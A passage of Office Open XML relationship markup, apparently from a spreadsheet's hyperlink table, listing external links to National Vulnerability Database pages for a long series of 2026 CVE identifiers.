Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66305" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68835" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68889" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68893" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69272" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69274" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69296" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69305" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69313" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69314" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69336" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69337" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69338" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69340" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69357" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69358" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69364" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69366" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69384" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69396" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69451" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69460" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69482" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69536" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69553" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69597" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69602" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69688" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69706" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69757" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69761" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69775" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73321" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81781" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81798" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82076" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84817" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84818" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84820" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86074" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86081" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86713" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86718" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86724" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86725" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86734" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9331" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50349" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58848" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62653" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62654" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62694" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68824" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68825" TargetMode="External" Id="rId894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68837" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68847" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68884" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68897" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69275" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69279" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69280" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69281" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69287" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69292" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69299" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69300" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69309" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69310" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69311" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69331" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69333" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69335" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69341" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69362" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69379" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69383" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69385" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69388" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69394" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69398" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69401" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69404" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69410" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69430" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69440" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69441" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69448" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69466" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69468" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69470" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69472" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69473" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69488" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69492" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69498" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69500" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69501" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69516" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69517" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69540" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69549" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69560" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69563" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69564" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69567" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69573" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69574" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69575" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69578" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69581" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69600" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69605" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69606" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69610" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69611" TargetMode="External" Id="rId959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69613" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69617" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69621" TargetMode="External" Id="rId962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69630" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69645" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69648" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69652" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69654" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69682" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69692" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69693" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69694" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69708" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69711" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69735" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69779" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69791" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69806" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70577" TargetMode="External" Id="rId996" /><Relationship 